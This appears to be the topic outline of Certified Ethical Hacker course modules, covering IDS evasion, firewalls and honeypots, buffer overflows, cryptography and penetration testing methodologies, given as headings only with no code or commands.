  • Intrusion Detection System
  • System Integrity Verifiers
  • How are Intrusions Detected?
  • Anomaly Detection
  • Signature Recognition
  • How does IDS match Signatures with Incoming Traffic?
  • Protocol Stack Verification
  • Application Protocol Verification
  • What Happens after an IDS Detects an Attack?
  • IDS Software Vendors
  • SNORT
  • Evading IDS (Techniques)
  • Complex IDS Evasion
  • Hacking Tool: fragrouter
  • Hacking Tool: TCPReplay
  • Hacking Tool: SideStep
  • Hacking Tool: NIDSbench
  • Hacking Tool: ADMutate
  • IDS Detection
  • Tools to Detect Packet Sniffers
  • Tools to inject strangely formatted packets onto the wire
  • Hacking Through Firewalls
  • Placing Backdoors through Firewalls
  • Hiding behind Covert Channels
  • Hacking Tool: Ncovert
  • What is a Honeypot?
  • Honeypots Evasion
  • Honeypots vendors
  • Hacking Tool: Honeyd

Certified Ethical Hacker (CEH) Module 20: Buffer Overflows
  • What is a Buffer Overflow?
  • Exploitation
  • Assembly Language Basics
  • How to Detect Buffer Overflows in a Program?
  • Skills Required
  • CPU/OS Dependency
  • Understanding Stacks
  • Stack Based Buffer Overflows

  • Buffer Overflow Technical Implementation
  • Writing your own Buffer Overflow Exploit in C
  • Defense against Buffer Overflows
  • Type Checking Tools for Compiling Programs
  • StackGuard
  • Immunix
Certified Ethical Hacker (CEH) Module 21: Cryptography
  • What is PKI?
  • Digital Certificates
  • RSA
  • MD-5
  • RC-5
  • SHA
  • SSL
  • PGP
  • SSH
  • Encryption Cracking Techniques

Certified Ethical Hacker (CEH) Module 22: Penetration Testing Methodologies
  • Physical Security Testing
  • Port Scanning Testing
  • System Identification Testing
  • Services Identification Testing
  • Vulnerability Research and Verification Testing
  • Application Testing and Source Code Review
  • Router Testing
  • Firewall Testing
  • Intrusion Detection System Testing
  • Domain Trusted Systems Testing





  • Application Password Cracking Testing
  • Denial of Service Testing
  • Containment Measures Testing
  • Information Security
  • Document Grinding
  • Gathering Competitive Intelligence
  • Social Engineering Testing
  • Wireless Networks Testing
  • Cordless Communications Testing
  • Infrared Systems Testing
  • Modem Testing
  • Writing Penetration Testing Reports